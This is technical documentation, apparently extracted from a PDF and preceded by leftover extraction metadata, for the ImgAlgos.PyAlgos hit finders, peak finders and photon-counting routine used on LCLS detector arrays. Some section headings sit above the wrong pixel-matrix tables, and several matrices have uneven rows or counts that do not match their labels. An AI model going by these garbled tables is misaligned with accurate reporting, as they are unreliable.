[21017, 21198, null], [21198, 21361, null], [21361, 21716, null], [21716, 22194, null], [22194, 22525, null], [22525, 22721, null], [22721, 22899, null], [22899, 23135, null], [23135, 23320, null], [23320, 23636, null], [23636, 24249, null], [24249, 24498, null], [24498, 24957, null], [24957, 25653, null], [25653, 26300, null], [26300, 27012, null], [27012, 27115, null], [27115, 27358, null], [27358, 27498, null], [27498, 27576, null], [27576, 27724, null], [27724, 27807, null], [27807, 27956, null], [27956, 28247, null], [28247, 28480, null], [28480, 28827, null], [28827, 29311, null], [29311, 29725, null], [29725, 30089, null], [30089, 30216, null], [30216, 30512, null], [30512, 30673, null], [30673, 31046, null], [31046, 31295, null], [31295, 31464, null], [31464, 31954, null], [31954, 31982, null], [31982, 32324, null], [32324, 32646, null], [32646, 33039, null], [33039, 33471, null], [33471, 33718, null], [33718, 33973, null], [33973, 34319, null], [34319, 34447, null], [34447, 34583, null], [34583, 34783, null], [34783, 35160, null], [35160, 35480, null], [35480, 35586, null], [35586, 35675, null], [35675, 35820, null], [35820, 36053, null], [36053, 36303, null], [36303, 36501, null], [36501, 36744, null], [36744, 36960, null], [36960, 37239, null], [37239, 37554, null], [37554, 37979, null], [37979, 38211, null], [38211, 38246, null], [38246, 38830, null], [38830, 39268, null]], "google_gemma-3-12b-it_is_public_document": [[0, 59, true], [59, 270, null], [270, 619, null], [619, 898, null], [898, 1638, null], [1638, 2164, null], [2164, 2798, null], [2798, 3142, null], [3142, 3524, null], [3524, 3947, null], [3947, 4307, null], [4307, 4553, null], [4553, 4780, null], [4780, 4991, null], [4991, 5315, null], [5315, 6094, null], [6094, 6641, null], [6641, 7107, null], [7107, 7330, null], [7330, 7941, null], [7941, 8523, null], [8523, 9045, null], [9045, 9654, null], [9654, 10058, null], [10058, 10225, null], [10225, 10240, null], [10240, 10763, null], [10763, 11472, null], [11472, 11778, null], [11778, 12038, null], [12038, 12403, null], [12403, 12771, null], [12771, 13100, null], [13100, 13315, null], [13315, 13684, null], [13684, 13828, null], [13828, 13979, null], [13979, 14223, null], [14223, 14423, null], [14423, 14688, null], [14688, 15323, null], [15323, 15532, null], [15532, 15781, null], [15781, 16282, null], [16282, 16431, null], [16431, 16656, null], [16656, 16863, null], [16863, 17202, null], [17202, 17225, null], [17225, 17532, null], [17532, 17929, null], [17929, 18006, null], [18006, 18575, null], [18575, 19246, null], [19246, 19377, null], [19377, 19472, null], [19472, 19562, null], [19562, 19932, null], [19932, 20467, null], [20467, 20738, null], [20738, 21017, null], [21017, 21198, null], [21198, 21361, null], [21361, 21716, null], [21716, 22194, null], [22194, 22525, null], [22525, 22721, null], [22721, 22899, null], [22899, 23135, null], [23135, 23320, null], [23320, 23636, null], [23636, 24249, null], [24249, 24498, null], [24498, 24957, null], [24957, 25653, null], [25653, 26300, null], [26300, 27012, null], [27012, 27115, null], [27115, 27358, null], [27358, 27498, null], [27498, 27576, null], [27576, 27724, null], [27724, 27807, null], [27807, 27956, null], [27956, 28247, null], [28247, 28480, null], [28480, 28827, null], [28827, 29311, null], [29311, 29725, null], [29725, 30089, null], [30089, 30216, null], [30216, 30512, null], [30512, 30673, null], [30673, 31046, null], [31046, 31295, null], [31295, 31464, null], [31464, 31954, null], [31954, 31982, null], [31982, 32324, null], [32324, 32646, null], [32646, 33039, null], [33039, 33471, null], [33471, 33718, null], [33718, 33973, null], [33973, 34319, null], [34319, 34447, null], [34447, 34583, null], [34583, 34783, null], [34783, 35160, null], [35160, 35480, null], [35480, 35586, null], [35586, 35675, null], [35675, 35820, null], [35820, 36053, null], [36053, 36303, null], [36303, 36501, null], [36501, 36744, null], [36744, 36960, null], [36960, 37239, null], [37239, 37554, null], [37554, 37979, null], [37979, 38211, null], [38211, 38246, null], [38246, 38830, null], [38830, 39268, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 39268, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 39268, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 39268, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 39268, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 39268, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 39268, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 39268, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 39268, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 39268, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 39268, null]], "pdf_page_numbers": [[0, 59, 1], [59, 270, 2], [270, 619, 3], [619, 898, 4], [898, 1638, 5], [1638, 2164, 6], [2164, 2798, 7], [2798, 3142, 8], [3142, 3524, 9], [3524, 3947, 10], [3947, 4307, 11], [4307, 4553, 12], [4553, 4780, 13], [4780, 4991, 14], [4991, 5315, 15], [5315, 6094, 16], [6094, 6641, 17], [6641, 7107, 18], [7107, 7330, 19], [7330, 7941, 20], [7941, 8523, 21], [8523, 9045, 22], [9045, 9654, 23], [9654, 10058, 24], [10058, 10225, 25], [10225, 10240, 26], [10240, 10763, 27], [10763, 11472, 28], [11472, 11778, 29], [11778, 12038, 30], [12038, 12403, 31], [12403, 12771, 32], [12771, 13100, 33], [13100, 13315, 34], [13315, 13684, 35], [13684, 13828, 36], [13828, 13979, 37], [13979, 14223, 38], [14223, 14423, 39], [14423, 14688, 40], [14688, 15323, 41], [15323, 15532, 42], [15532, 15781, 43], [15781, 16282, 44], [16282, 16431, 45], [16431, 16656, 46], [16656, 16863, 47], [16863, 17202, 48], [17202, 17225, 49], [17225, 17532, 50], [17532, 17929, 51], [17929, 18006, 52], [18006, 18575, 53], [18575, 19246, 54], [19246, 19377, 55], [19377, 19472, 56], [19472, 19562, 57], [19562, 19932, 58], [19932, 20467, 59], [20467, 20738, 60], [20738, 21017, 61], [21017, 21198, 62], [21198, 21361, 63], [21361, 21716, 64], [21716, 22194, 65], [22194, 22525, 66], [22525, 22721, 67], [22721, 22899, 68], [22899, 23135, 69], [23135, 23320, 70], [23320, 23636, 71], [23636, 24249, 72], [24249, 24498, 73], [24498, 24957, 74], [24957, 25653, 75], [25653, 26300, 76], [26300, 27012, 77], [27012, 27115, 78], [27115, 27358, 79], [27358, 27498, 80], [27498, 27576, 81], [27576, 27724, 82], [27724, 27807, 83], [27807, 27956, 84], [27956, 28247, 85], [28247, 28480, 86], [28480, 28827, 87], [28827, 29311, 88], [29311, 29725, 89], [29725, 30089, 90], [30089, 30216, 91], [30216, 30512, 92], [30512, 30673, 93], [30673, 31046, 94], [31046, 31295, 95], [31295, 31464, 96], [31464, 31954, 97], [31954, 31982, 98], [31982, 32324, 99], [32324, 32646, 100], [32646, 33039, 101], [33039, 33471, 102], [33471, 33718, 103], [33718, 33973, 104], [33973, 34319, 105], [34319, 34447, 106], [34447, 34583, 107], [34583, 34783, 108], [34783, 35160, 109], [35160, 35480, 110], [35480, 35586, 111], [35586, 35675, 112], [35675, 35820, 113], [35820, 36053, 114], [36053, 36303, 115], [36303, 36501, 116], [36501, 36744, 117], [36744, 36960, 118], [36960, 37239, 119], [37239, 37554, 120], [37554, 37979, 121], [37979, 38211, 122], [38211, 38246, 123], [38246, 38830, 124], [38830, 39268, 125]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 39268, 0.0085]]}
|
olmocr_science_pdfs
|
2024-12-04
|
2024-12-04
|
496ab0dd025aad87bfdbdbc0059e7acbe7b10f6c
|
Hit and Peak Finding Algorithms
This note is about n-d array processing algorithms implemented in `ImgAlgos.PyAlgos`. Algorithms can be called from python but low level implementation is done on C++ with `boost/python` wrapper. All examples are shown for python level interface.
Content
- Content
- Common features of algorithms
- n-d arrays
- Windows
- Mask
- Make object and set parameters
- Define ROI using windows and/or mask
- Hit finders
- Number of pixels above threshold
- `number_of_pix_above_thr`
- Total intensity above threshold
- `intensity_of_pix_above_thr`
- Peak finders
- Peak selection parameters
- Two threshold "Droplet finder"
- `peak_finder_v1`
- `peak_finder_v4`
- Flood filling algorithm
- `peak_finder_v2`
- Local maxima search algorithm
- `peak_finder_v3`
- Demonstration for local maximum map
- Evaluation of the background level, rms, and S/N ratio
- Matrices of pixels for r0=3 and 4 and different dr values
- Matrices of pixels for r0=5 and 6 and different dr values
- Matrix of pixels for r0=7
- Test of peak finders
- Photon counting
- References
Common features of algorithms
n-d arrays
LCLS detector data come from DAQ as n-d arrays (ndarray in C++ or numpy.array in Python). In simple case camera data is an image presented by the 2-d array. For composite detectors like CSPAD, CSPAD2X2, EPIX, PNCCD, etc. data comes from a set of sensors as 3-d or 4-d arrays. If relative sensors’ positions are known, then sensors can be composed in 2-d image. But this image contains significant portion of "fake" empty pixels, that may be up to ~20-25% in case of CSPAD. Most efficient data processing algorithms should be able to work with n-d arrays.
Windows
In some experiments not all sensors contain useful data. It might be more efficient to select Region of Interest (ROI) on sensors, where data need to be processed. To support this feature a tuple (or list) of windows is passed as a constructor parameter. Each window is presented by the tuple of 5 parameters `(segnum, rowmin, rowmax, colmin, colmax)`, where `segnum` is a sensor index in the n-d array, other parameters constrain window 2-d matrix rows and columns. Several windows can be defined for the same sensor using the same `segnum`. For 2-d arrays `segnum` parameter is not used, but still needs to be presented in the window tuple by any integer number. To increase algorithm efficiency only pixels in windows are processed. If `windows=None`, all sensors will be processed.
The array of windows can be converted in 3-d or 2-d array of mask using method `pyimgalgos.GlobalUtils.mask_from_windows`.
Mask
Alternatively ROI can be defined by the mask of good/bad (1/0) pixels. For 2-d image mask can easily be defined in user’s code. In case of 3-d
arrays the Mask Editor helps to produce ROI mask. Entire procedure includes
- conversion of n-d array to 2-d image using geometry,
- production of ROI 2-d mask with Mask Editor,
- conversion of the 2-d mask to the mask n-d array using geometry.
All steps of this procedure can be completed in Calibration Management Tool under the tab ROI.
In addition mask accounts for bad pixels which should be discarded in processing. Total mask may be a product of ROI and other masks representing good/bad pixels.
**Make object and set parameters**
Any algorithm object can be created as shown below.
```python
import numpy as np
from ImgAlgos.PyAlgos import PyAlgos
# create object:
alg = PyAlgos(windows=winds, mask=mask, pbits=0)
```
**Define ROI using windows and/or mask**
Region Of Interest (ROI) is defined by the set of rectangular windows on segments and mask, as shown in example below.
```python
# List of windows
winds = None # entire size of all segments will be used for peak finding
winds = (( 0, 0, 185, 0, 388),
( 1, 20,160, 30,300),
( 7, 0, 185, 0, 388))
# Mask
mask = None # (default) all pixels in windows will be used for peak finding
mask = det.mask() # see class Detector.PyDetector
mask = np.loadtxt(fname_mask) #
mask.shape = <should be the same as shape of data n-d array>
```
**Hit finders**
Hit finders return simple values for decision on event selection. Two algorithms are implemented in ImgAlgos.PyAlgos. They count number of pixels and intensity above threshold in the Region Of Interest (ROI) defined by windows and mask parameters in object constructor.
Both hit-finders receive input n-d array `data` and threshold `thr` parameters and return a single value in accordance with method name.
**Number of pixels above threshold**
`number_of_pix_above_thr`
```python
npix = alg.number_of_pix_above_thr(data, thr=10)
```
**Total intensity above threshold**
intensity of pix above thr
```python
intensity = alg.intensity_of_pix_above_thr(data, thr=12)
```
Peak finders
Peak finder works on calibrated, background subtracted n-d array of data in the region of interest specified by the list of windows and using only good pixels from mask n-d array. All algorithms implemented here have three major stages
1. find a list of seed peak candidates
2. process peak candidates and evaluate their parameters
3. apply selection criteria to the peak candidates and return the list of peaks with their parameters
The list of peaks contains 17 (float for uniformity) parameters per peak:
- seg - segment index beginning from 0, example for CSPAD this index should be in the range (0,32)
- row - index of row beginning from 0
- col - index of column beginning from 0
- npix - number of pixels accounted in the peak
- amp_max - pixel with maximal intensity
- amp_total - total intensity of all pixels accounted in the peak
- row_cgrav - row coordinate of the peak evaluated as a "center of gravity" over pixels accounted in the peak using their intensities as weights
- col_cgrav - column coordinate of the peak evaluated as a "center of gravity" over pixels accounted in the peak using their intensities as weights
- raw_sigma - row sigma evaluated in the "center of gravity" algorithm
- col_sigma - column sigma evaluated in the "center of gravity" algorithm
- row_min - minimal row of the pixel group accounted in the peak
- row_max - maximal row of the pixel group accounted in the peak
- col_min - minimal column of the pixel group accounted in the peak
- col_max - maximal column of the pixel group accounted in the peak
- bkgd - background level estimated as explained in section below
- noise - r.m.s. of the background estimated as explained in section below
- son - signal over noise ratio estimated as explained in section below
There is a couple of classes helping to save/retrieve peak parameter records in/from the text file:
- `pyimgalgos.PeakStore`
- `pyimgalgos.TDFileContainer`
Peak selection parameters
Internal peak selection is done at the end of each peak finder, but all peak selection parameters need to be defined right after algorithm object is created. These peak selection parameters are set for all peak-finders:
```python
# create object:
alg = PyAlgos(windows=winds, mask=mask)
# set peak-selector parameters:
alg.set_peak_selection_pars(npix_min=5, npix_max=5000, amax_thr=0, atot_thr=0, son_min=10)
```
- npix_min: minimum number of pixels that pass the "low threshold" cut
- npix_max: maximum number of pixels that pass the "low threshold" cut
- amax_thr: pixel value must be greater than this high threshold to start a peak
- atot_thr: to be considered a peak the sum of all pixels in a peak must be greater than this value
- son_min: required signal-over-noise (where noise region is typically evaluated with radius/dr parameters). set this to zero to disable the signal-over-noise cut.
All peak finders have a few algorithm-dependent parameters
- nda - calibrated n-d array of data, pedestals and background should be subtracted, common mode - corrected
Two threshold "Droplet finder"
Two-threshold peak-finding algorithm in restricted region around pixel with maximal intensity. Two threshold allows to speed-up this algorithms. It is assumed that only pixels with intensity above \( \text{thr}_\text{high} \) are pretending to be peak candidate centers. Candidates are considered as a peak if their intensity is maximal in the (square) region of \( \text{radius} \) around them. Low threshold in the same region is used to account for contributing to peak pixels.
peak_finder_v1
```python
peaks = alg.peak_finder_v1(nda, thr_low=10, thr_high=150, radius=5, dr=0.05)
```
Parameter \( \text{radius} \) in this algorithm is used for two purpose:
- defines (square) region to search for local maximum with intensity above \( \text{thr}_\text{high} \) and contributing pixels with intensity above \( \text{thr}_\text{lo} \),
- is used as a \( \text{r}_0 \) parameter to evaluate background and noise rms as explained in section below.
peak_finder_v4
```python
peaks = alg.peak_finder_v4(nda, thr_low=10, thr_high=150, rank=4, r0=5, dr=0.05)
```
The same algorithm as peak_finder_v1, but parameter \( \text{radius} \) is split for two (unsigned) \( \text{rank} \) and (float) \( \text{r}_0 \) with the same meaning as in peak_finder_v3.
Flood filling algorithm
Define peaks for regions of connected pixels above threshold
peak_finder_v2
```python
peaks = alg.peak_finder_v2(nda, thr=10, r0=5, dr=0.05)
```
Two neighbor pixels are assumed connected if have common side. Pixels with intensity above threshold \( \text{thr} \) are considered only.
Local maximums search algorithm
Define peaks in local maximums of specified rank (radius), for example rank=2 means 5x5 pixel region around central pixel.
peak_finder_v3
```python
peaks = alg.peak_finder_v3(nda, rank=2, r0=5, dr=0.05)
```
- makes a map of pixels with local maximums of requested rank for data ndarray and mask, pixel code in the map may have bits 0/1/2/4 standing for not-a-maximum / maximum-in-row / maximum-in-column / maximum-in-rectangular-region of radius=rank.
- for each pixel with local maximal intensity in the region defined by the rank radius counts a number of pixels with intensity above zero, total positive intensity, center of gravity coordinates and rms,
- using parameters \( \text{r}_0 \) (ex.=5.0), \( \text{dr} \) (ex.=0.05) evaluates background level, rms of noise, and S/N for the pixel with maximal
• makes list of peaks which pass selector with parameters set in `set_peak_selection_pars`, for example
```python
alg.set_peak_selection_pars(npix_min=5, npix_max=500, amax_thr=0, atot_thr=1000, son_min=6)
```
Demonstration for local maximum map
Test for 100x100 image with random normal distribution of intensities
Example of the map of local maximums found for rank from 1 to 5:
Color coding of pixels:
Table for rank, associated 2-d region size, fraction of pixels recognized as local maximums for rank, and time consumption for this algorithm.
<table>
<thead>
<tr>
<th>rank</th>
<th>2-d region</th>
<th>fraction</th>
<th>time, ms</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>3x3</td>
<td>0.1062</td>
<td>5.4</td>
</tr>
<tr>
<td>2</td>
<td>5x5</td>
<td>0.0372</td>
<td>5.2</td>
</tr>
<tr>
<td>3</td>
<td>7x7</td>
<td>0.0179</td>
<td>5.1</td>
</tr>
<tr>
<td>4</td>
<td>9x9</td>
<td>0.0104</td>
<td>5.2</td>
</tr>
<tr>
<td>5</td>
<td>11x11</td>
<td>0.0066</td>
<td>5.2</td>
</tr>
</tbody>
</table>
Evaluation of the background level, rms, and S/N ratio
When peak is found, its parameters can be precised for background level, noise rms, and signal over background ratio (S/N) can be estimated. All these values can be evaluated using pixels surrounding the peak on some distance. For all peak-finders we use the same algorithm. Surrounding pixels are defined by the ring with internal radial parameter \( r_0 \) and ring width \( d_r \) (both in pixels). The number of surrounding pixels depends on \( r_0 \) and \( d_r \) parameters as shown in matrices below. We use notation
- + central pixel with maximal intensity,
- 1 pixels counted in calculation of averaged background level and noise rms,
- 0 pixels not counted.
Matrices of pixels for \( r_0=3 \) and 4 and different \( d_r \) values
Matrices of pixels for $r_0=5$ and $6$ and different $dr$ values
<table>
<thead>
<tr>
<th>$r_0=3$, $dr=0.1$ (4 pixels)</th>
<th>$r_0=3$, $dr=0.5$ (12 pixels)</th>
<th>$r_0=3$, $dr=1$ (24 pixels)</th>
</tr>
</thead>
<tbody>
<tr>
<td>0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 1 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 1 0 0 0 0 0</td>
<td>0 0 0 1 1 1 0 0 0 0</td>
<td>0 0 1 1 1 1 1 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0</td>
<td>0 1 0 0 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 1 0 0 + 0 0 1 0 0</td>
<td>0 1 0 0 + 0 0 1 0 0</td>
<td>1 1 0 0 + 0 0 1 1 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0</td>
<td>0 1 0 0 0 0 0 0 1 0</td>
<td>0 1 0 0 0 0 0 0 1 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0</td>
<td>0 1 0 0 0 0 0 0 1 0</td>
</tr>
<tr>
<td>0 0 0 0 1 0 0 0 0 0</td>
<td>0 0 0 1 1 1 0 0 0 0</td>
<td>0 0 1 1 1 1 1 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 1 0 0 0 0 0</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>$r_0=4$, $dr=0.2$ (12 pixels)</th>
<th>$r_0=4$, $dr=0.3$ (16 pixels)</th>
<th>$r_0=4$, $dr=0.5$ (24 pixels)</th>
</tr>
</thead>
<tbody>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 1 1 1 0 0 0 0 0</td>
<td>0 0 0 0 1 1 1 0 0 0 0 0</td>
<td>0 0 0 1 1 1 1 1 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 1 0 0 0 0 0 1 0 0 0</td>
<td>0 0 1 0 0 0 0 0 1 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 1 0 0 0 0 0 0 0 1 0 0 0</td>
</tr>
<tr>
<td>0 1 0 0 0 0 0 0 0 1 0 0</td>
<td>0 1 0 0 0 0 0 0 0 1 0 0</td>
<td>0 1 0 0 0 0 0 0 0 1 0 0 0</td>
</tr>
<tr>
<td>0 1 0 0 0 + 0 0 0 1 0 0</td>
<td>0 1 0 0 0 + 0 0 0 1 0 0</td>
<td>0 1 0 0 0 + 0 0 0 1 0 0 0</td>
</tr>
<tr>
<td>0 1 0 0 0 0 0 0 1 0 0 0</td>
<td>0 1 0 0 0 0 0 0 1 0 0 0</td>
<td>0 1 0 0 0 0 0 0 1 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 1 0 0 0 0 0 0 0 1 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 1 0 0 0 0 0 1 0 0 0</td>
<td>0 0 1 0 0 0 0 0 1 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 1 1 1 0 0 0 0 0</td>
<td>0 0 0 0 1 1 1 0 0 0 0 0</td>
<td>0 0 0 1 1 1 1 1 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0</td>
</tr>
</tbody>
</table>
**Matrix of pixels for r0=7**
<table>
<thead>
<tr>
<th>r0=5, dr=0.05 (12 pixels)</th>
<th>r0=5, dr=0.5 (28 pixels)</th>
</tr>
</thead>
<tbody>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 1 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 1 1 1 1 1 0 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 1 0 0 0 0 0 1 0 0 0 0 0</td>
<td>0 0 1 0 0 0 0 0 1 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 1 0 0 0 0 0 1 0 0 0 0 0 0</td>
<td>0 0 1 0 0 0 0 0 0 1 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 1 0 0 0 0 0 1 0 0 0 0 0</td>
<td>0 0 1 0 0 0 0 0 0 1 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 1 0 0 0 0 0 1 0 0 0 0 0</td>
<td>0 0 0 1 0 0 0 0 0 1 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 1 0 0 0 0 0 1 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 1 1 1 1 1 0 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 1 1 1 1 1 0 0 0 0 0 0 0</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>r0=6, dr=0.2 (12 pixels)</th>
<th>r0=6, dr=0.5 (28 pixels)</th>
</tr>
</thead>
<tbody>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 1 1 0 0 0 0 0 0 0 0</td>
<td>0 0 0 1 1 1 1 1 0 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 1 0 0 0 0 0 0 1 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 1 0 0 0 0 0 0 0 1 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 1 0 0 0 0 0 0 0 1 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 1 1 1 1 1 0 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 1 0 0 0 0 0 0 0 1 0 0 0 0</td>
</tr>
<tr>
<td>0 0 1 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 1 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 1 0 0 0 0 0 0 0 1 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 1 1 0 0 0 0 0 0 0</td>
<td>0 0 0 1 1 1 1 1 0 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 1 1 1 1 1 0 0 0 0 0 0 0</td>
</tr>
</tbody>
</table>
Photon conversion in pixel detectors is complicated by the split photons between neighboring pixels. In some cases, energy deposited by a photon is split between two or (sometimes) more pixels. The photon counting algorithm described here is designed to account for this effect and return an unassembled array with correct number of photons per pixel. Pythonic API for this algorithm is as follows:
```python
# Import
import psana
# Initialize a detector object
det = psana.Detector('myAreaDetectorName')
# Merges photons split among pixels and returns n-d array with integer number of photons per pixel.
nphotons_nda = det.photons(evt, nda_calib=None, mask=None, adu_per_photon=None)
```
The `det.photons()` function divides the pixel intensities (ADUs) by `adu_per_photon`, resulting in a fractional number of photons for each pixel. This function is a wrapper around `photons()` method in PyAlgos.
# Import
from ImgAlgos.PyAlgos import photons
# Merges photons split among pixels and returns n-d array with integer number of photons per pixel.
nphotons_nda = photons(fphotons, adu_per_photon=30)
Sphinx doc
Method `photons` receives (float) n-d numpy array `fphotons` representing image intensity in terms of (float) fractional number of photons and an associated mask of bad pixels. Both arrays should have the same shape. Two lowest dimensions represent pixel rows and columns in 2-d pixel matrix arrays. Algorithm works with good pixels defined by the mask array (1/0 = good/bad pixel). Array `fphotons` is represented with two arrays; An array containing whole number of photons (integer) and the leftover fractional number of photon array (float) of the same shape. Assuming the photons are only split between two adjacent pixels, we round up the adjacent pixels if they sum up to be above 0.9 photons. The algorithm is best explained using an example:
Let's say we measured the following ADUs on our detector. "adu_per_photon" is user-defined, but for this example let's set it to 1:
<table>
<thead>
<tr>
<th>ADUs (adu_per_photon=1):</th>
<th>Whole photons</th>
<th>Fractional photons</th>
</tr>
</thead>
<tbody>
<tr>
<td>0.0 3.5 0.1 0.2</td>
<td>0 3 0 0</td>
<td>0.0 0.5 0.1 0.2</td>
</tr>
<tr>
<td>0.2 0.4 0.0 1.2</td>
<td>0 0 0 1</td>
<td>0.2 0.4 0.0 0.2</td>
</tr>
<tr>
<td>0.1 4.7 3.4 0.0</td>
<td>0 4 3 0</td>
<td>0.1 0.7 0.4 0.0</td>
</tr>
<tr>
<td>0.5 0.4 0.4 0.1</td>
<td>0 0 0 0</td>
<td>0.5 0.4 0.4 0.1</td>
</tr>
</tbody>
</table>
We expect the converted photon counts to be:
<table>
<thead>
<tr>
<th>Photons:</th>
</tr>
</thead>
<tbody>
<tr>
<td>0 4 0 0</td>
</tr>
<tr>
<td>0 0 0 1</td>
</tr>
<tr>
<td>0 5 3 0</td>
</tr>
<tr>
<td>1 0 0 0</td>
</tr>
</tbody>
</table>
To see how we get from ADUs to Photons, we split the ADUs into whole photons and fractional photons.
Assuming the photons are only split by two adjacent pixels, we search for a pixel that has at least 0.5 photons with an adjacent pixel that sum up to above 0.9 photons. In cases where a pixel has multiple adjacent pixels which sum up to above 0.9 photons, we take the largest adjacent pixel. If such an adjacent pair of pixels is found, then the adjacent pixel values are merged into one pixel. It is merged into the pixel with the larger value. (See "After merging adjacent pixels" example below).
The merged adjacent pixels are then rounded to whole photons. (See "Rounded whole photons" example below).
Fractional photons
0.0 0.5 0.1 0.2
0.2 0.4 0.0 0.2
0.1 0.7 0.4 0.0
0.5 0.4 0.4 0.1
After merging adjacent pixels:
0.0 0.9 0.1 0.2
0.2 0.0 0.0 0.2
0.1 1.1 0.0 0.0
0.9 0.0 0.4 0.1
Rounded whole photons:
0 1 0 0
0 0 0 0
0 1 0 0
1 0 0 0
Photons is then the sum of "Whole photons" and "Rounded whole photons":
Photons = Whole photons + Rounded whole photons:
0 4 0 0 0 3 0 0 0 1 0 0
0 0 0 1 = 0 0 0 1 + 0 0 0 0
0 5 3 0 0 4 3 0 0 1 0 0
1 0 0 0 0 0 0 0 1 0 0 0
References
- ImgAlgos.PyAlgos - code documentation
- psalgos - new peak-finder and other algorithms code documentation
- Peak Finding - short announcement about peak finders
- Hit and Peak Finders - examples in Chris' tutorial
- GUI for tuning peak finding - Chun's page in development
- Auto-generated documentation - references to code-based documentation for a few other useful packages
- pyimgalgos.PeakStore - class helping to save peak parameter records in the text file
- pyimgalgos.TDFileContainer - class helping to retrieve peak parameter records from the text file
- Test of Peak Finders - example of exploitation of peak finders
- Test of Peak Finders - V2 - example of exploitation of peak finders after revision 1 (uniformization)
- photons - sphinx doc
- Peak Finding Module - (depricated) psana module, it demonstration examples and results
- Psana Module Catalog - (depricated) peak finding psana modules
- Psana Module Examples - (depricated) peak finding examples in psana modules
|
